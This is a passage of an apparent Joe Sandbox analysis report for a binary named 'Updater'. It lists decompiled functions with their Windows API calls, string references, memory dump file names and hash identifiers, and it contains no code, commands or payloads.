_wcslen.LIBCMT ref: 00B8D4D1
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B8D538
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B8D566

Strings

0, xrefs: 00B8D44B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: c14af434f1724df2046c09b2d516efc42b4f86ac5efcc04bd82f92f2a3e62c68
Instruction ID: 0241f2e276a804d6a0fea45037f32eeae0e7e9658411a1c3f7c1fabb871177f2
Opcode Fuzzy Hash: c14af434f1724df2046c09b2d516efc42b4f86ac5efcc04bd82f92f2a3e62c68
Instruction Fuzzy Hash: 0451CF716043019BD714BF28D885BAA77E8EB55328F040AABF995D32F0DBB0D904CB52

Function 00BAB76E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00BAB8AF

Part of subcall function 00B32306: _wcslen.LIBCMT ref: 00B3230B

GetProcessId.KERNEL32(00000000), ref: 00BAB944
CloseHandle.KERNEL32(00000000), ref: 00BAB973

Strings

<, xrefs: 00BAB877
@, xrefs: 00BAB87E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 5f7654b4a6a14dcd46ee52642e684ee523e9a957c95ac05563ea4bcf204275f3
Instruction ID: da65f753767016487a2c04917534d4af6df87e55a9562567cfb69fc039428928
Opcode Fuzzy Hash: 5f7654b4a6a14dcd46ee52642e684ee523e9a957c95ac05563ea4bcf204275f3
Instruction Fuzzy Hash: 9A717C74A00219DFCB14DF54D484A9EBBF4FF09710F0484A9E969AB352DB79EE40CBA4

Function 00BB472C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB47EA
IsMenu.USER32(?), ref: 00BB47FF
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB4847
DrawMenuBar.USER32 ref: 00BB485A

Strings

0, xrefs: 00BB4739

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: c2260f956b32a74de1cdcca0013e2da61b32fd776d464dbac70f37cc144d1f0a
Instruction ID: 9e0f13d7707b679968ce9357f040ee0c143dfd798c48af772b66f86630cce70e
Opcode Fuzzy Hash: c2260f956b32a74de1cdcca0013e2da61b32fd776d464dbac70f37cc144d1f0a
Instruction Fuzzy Hash: CC416874A00289EFDF20CF55D884AEABBF8FF44714F0481A9E90897251D7B0ED40CB90

Function 00B82E91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B82F15
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B82F28
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B82F58

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

Strings

ListBox, xrefs: 00B82ED4
ComboBox, xrefs: 00B82E9F

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 75214420b33edf0f754156669f012d2780e58e704e2cd9cf0d376fbb08903b1f
Instruction ID: 29912b7e17394f1a36b211f0684e5a53a4b653e00513abbba076eeefd0c1699f
Opcode Fuzzy Hash: 75214420b33edf0f754156669f012d2780e58e704e2cd9cf0d376fbb08903b1f
Instruction Fuzzy Hash: 79210475900105AFDB14BB6498858FEB7F9DB45360B1082AAB916971E0EB384C09D720

Function 00BB3895 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B34570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
Part of subcall function 00B34570: GetStockObject.GDI32(00000011), ref: 00B345C2
Part of subcall function 00B34570: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BB390F
LoadLibraryW.KERNEL32(?), ref: 00BB3916
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BB392B
DestroyWindow.USER32(?), ref: 00BB3933

Strings

SysAnimate32, xrefs: 00BB38EA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b7a6fc46bdea6ab68d3cbdee43a7b8874d4fcbd8908b2cab6dc28da61dc68c28
Instruction ID: d6cbf4f5b726ace4bd2dfe3285a6d73c683ee8d98146f8b868d91f5ebd23c5da
Opcode Fuzzy Hash: b7a6fc46bdea6ab68d3cbdee43a7b8874d4fcbd8908b2cab6dc28da61dc68c28
Instruction Fuzzy Hash: E4218871600206ABEF204E65DC80EFB77E9EF59B64F204668F992A31A0DBF1CD419760

Function 00B84024 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F

Part of subcall function 00B83E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B83EB2
Part of subcall function 00B83E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83EC3
Part of subcall function 00B83E94: GetCurrentThreadId.KERNEL32 ref: 00B83ECA
Part of subcall function 00B83E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,00B8368B), ref: 00B83ED1

GetFocus.USER32 ref: 00B8404B
GetParent.USER32(00000000), ref: 00B84068
GetClassNameW.USER32(?,?,00000100), ref: 00B840A7
EnumChildWindows.USER32(?,00B84110), ref: 00B840CF

Strings

%s%d, xrefs: 00B840E3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 166983fdb7766f119ee4e8338b6c766cad4534d290e894cc5f434b2092a77085
Instruction ID: 71ce0e47b521db260165beabc6a8cf9edf0fd3d7652493f5b216623a051b4d3f
Opcode Fuzzy Hash: 166983fdb7766f119ee4e8338b6c766cad4534d290e894cc5f434b2092a77085
Instruction Fuzzy Hash: 6E21A175600206ABCF10BF60DC85AFA77E9AF94710F0440F6FE0A9B162DB755905CBB0

Function 00B44C79 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B44C2A,00000003,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002), ref: 00B44C99
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B44CAC
FreeLibrary.KERNEL32(00000000,?,?,?,00B44C2A,00000003,?,00B44BCA,00000003,00BE9500,0000000C,00B44D21,00000003,00000002,00000000), ref: 00B44CCF

Strings

CorExitProcess, xrefs: 00B44CA4
mscoree.dll, xrefs: 00B44C92

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 544f06b13d3e142fa31025c90178f3390a0fdd21263f409a329634264fa2e5d2
Instruction ID: 1c602f974793e534f939306476e844d9a82ae6c37259e5e0ef75d08645bb1eae
Opcode Fuzzy Hash: 544f06b13d3e142fa31025c90178f3390a0fdd21263f409a329634264fa2e5d2
Instruction Fuzzy Hash: 55F04F70A01218BBDB159F94DD4DB9EBBF8EF04751F0401A9F806B32A1EF759E50DA90

Function 00B3290F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3291B
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3292D
FreeLibrary.KERNEL32(00000000,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3293F

Strings

kernel32.dll, xrefs: 00B32913
Wow64DisableWow64FsRedirection, xrefs: 00B32927

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: b646f08a802f416f44e70d7220f22fdbf5e268102db6db606c646325451b4ce7
Instruction ID: 9f51fa2c48594cf6d051cdf6d677f156d9fc24a60e6a316c479fd9d11b844b8c
Opcode Fuzzy Hash: b646f08a802f416f44e70d7220f22fdbf5e268102db6db606c646325451b4ce7
Instruction Fuzzy Hash: 0EE0CD356016222B8351171AAC0C76E76D8DFD2F22F1502B5F904F3120FFDCCC0280A1

Function 00B328D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B328E1
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B328F3
FreeLibrary.KERNEL32(00000000,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B32906

Strings

Wow64RevertWow64FsRedirection, xrefs: 00B328ED
kernel32.dll, xrefs: 00B328DA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: e4c511894dec09d78496a3d12c8e01fe5849051c39660ba62fde001f3269b010
Instruction ID: c4ab1cfd3c88dc851ed4ed717c285b9b5ede00bac3d2fde3c372e4d20d2d5fd5
Opcode Fuzzy Hash: e4c511894dec09d78496a3d12c8e01fe5849051c39660ba62fde001f3269b010
Instruction Fuzzy Hash: 19D0123560262A5786262729AC0CB9B7A95DF81F1171542B5F804B3124DFB9CD12C590

Function 00B936AD Relevance: 7.8, APIs: 5, Instructions: 314fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B9396B
DeleteFileW.KERNEL32(?), ref: 00B939ED
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B93A03
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B93A14
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B93A26

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 5c419671942451ea1bdbf694617220cffb799fac735d8b03d8ddadc73ee79144
Instruction ID: 6de3edd46ee3b46905dd84acc8f0122d57ce69d340712029dacf4c758b1a59d3
Opcode Fuzzy Hash: 5c419671942451ea1bdbf694617220cffb799fac735d8b03d8ddadc73ee79144
Instruction Fuzzy Hash: BCB13B71A00119ABDF15EBA4CC85EDEBBFDEF48710F1041F6F609A6151EA349B448B61

Function 00BAAD7F Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00BAAE1F
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BAAE2D
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BAAE60
CloseHandle.KERNEL32(?), ref: 00BAB035

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 2d78f80b43dd86c87f792785cc2343d4c8776b7e76c3840b33c9ad676673c0e3
Instruction ID: 6b35d42bffc7e7bc54b94655a4070d2c278eb0532ea1db13968a2cff4dfae103
Opcode Fuzzy Hash: 2d78f80b43dd86c87f792785cc2343d4c8776b7e76c3840b33c9ad676673c0e3
Instruction Fuzzy Hash: 36A19A71604300AFD320DF24D896F2AB7E1AF44710F14889DF9A9DB292DBB5ED408B92

Function 00BAB074 Relevance: 7.7, APIs: 5, Instructions: 181processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00BAB0A4
Process32FirstW.KERNEL32(00000000,?), ref: 00BAB0B2

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00BAB136
Process32NextW.KERNEL32(00000000,?), ref: 00BAB19E
CloseHandle.KERNEL32(00000000), ref: 00BAB1B0

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 934f19617e8ea02888a2fd982074d090c2d2bba96699b25e890f0855df355260
Instruction ID: 709c16e3ec955a2df5c2a25f62dca8b775c325f3d852eb756d8a3f1d0335c798
Opcode Fuzzy Hash: 934f19617e8ea02888a2fd982074d090c2d2bba96699b25e890f0855df355260
Instruction Fuzzy Hash: DA6168B1508311AFC710EF64D886E6BBBE8FF89750F00496DF99997291EB30D904CB92

Function 00BAC3C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC4A5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAC500
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BAC563
RegCloseKey.ADVAPI32(?), ref: 00BAC5A6
RegCloseKey.ADVAPI32(00000000), ref: 00BAC5B3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_wcslen
String ID:
API String ID: 3132563372-0
Opcode ID: 08c041c82acfb9ccb6184302b868ddf364ecfdf76b42c37e66cc1812ac6ac83a
Instruction ID: 2c44dbf3c380e6f8271c2a62ca77fe36d94683c66373b3b5d96d330de6854625
Opcode Fuzzy Hash: 08c041c82acfb9ccb6184302b868ddf364ecfdf76b42c37e66cc1812ac6ac83a
Instruction Fuzzy Hash: 2F61B231508201AFC714DF24C491E6ABBE5FF89308F5489ACF49A8B2A2DB35ED45CB91

Function 00B995DA Relevance: 7.6, APIs: 5, Instructions: 144COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B9968D
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B996B9
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B99711
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B99736
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B9973E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: df9c50b4c1e00f817e3dd80746c504894f614642a7eb2ab86bf6ef9385f01ec8
Instruction ID: f0bc6cb154f435652a5f10798fe9f692b1eeaa7a5b054b1dcf9652decd95f74e
Opcode Fuzzy Hash: df9c50b4c1e00f817e3dd80746c504894f614642a7eb2ab86bf6ef9385f01ec8
Instruction Fuzzy Hash: 39511E35A00219EFCF15DF54C881A6ABBF5FF48714F0480A8E949AB362DB39ED41DB60

Function 00BA98C8 Relevance: 7.6, APIs: 5, Instructions: 144libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00BA9924
GetProcAddress.KERNEL32(00000000,?), ref: 00BA99B4
GetProcAddress.KERNEL32(00000000,00000000), ref: 00BA99D0
GetProcAddress.KERNEL32(00000000,?), ref: 00BA9A16
FreeLibrary.KERNEL32(00000000), ref: 00BA9A36

Part of subcall function 00B400D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B91DC1,?,753CE610), ref: 00B400F0
Part of subcall function 00B400D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B80B20,00000000,00000000,?,?,00B91DC1,?,753CE610,?,00B80B20), ref: 00B40117

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: af27e03c777207e6a754edd1450d1b0fdaf69aade274b049052e4608ff7ef0fa
Instruction ID: 5dd548119084369989a69c24d37f8cefcc31309e1a1af2b3e649f6030d41bc6e
Opcode Fuzzy Hash: af27e03c777207e6a754edd1450d1b0fdaf69aade274b049052e4608ff7ef0fa
Instruction Fuzzy Hash: 38516B35604215EFCB10DF58C4909AEBBF4FF49714B0480E9E919AB322DB31EE85DB91

Function 00BB7526 Relevance: 7.6, APIs: 5, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 895b54a9bbc4349eb04225c008664320b3e148843369f2fe0b68ba8bd9962f93
Instruction ID: 8164b3aba6e22c1a50032ef55794ec20760b530eda6d59f05e6103f6842af080
Opcode Fuzzy Hash: 895b54a9bbc4349eb04225c008664320b3e148843369f2fe0b68ba8bd9962f93
Instruction Fuzzy Hash: DF419335648104AFD7248F6CCC88FF57BE5EB99350F1502A5F91AA72E0DBB0AD50D690

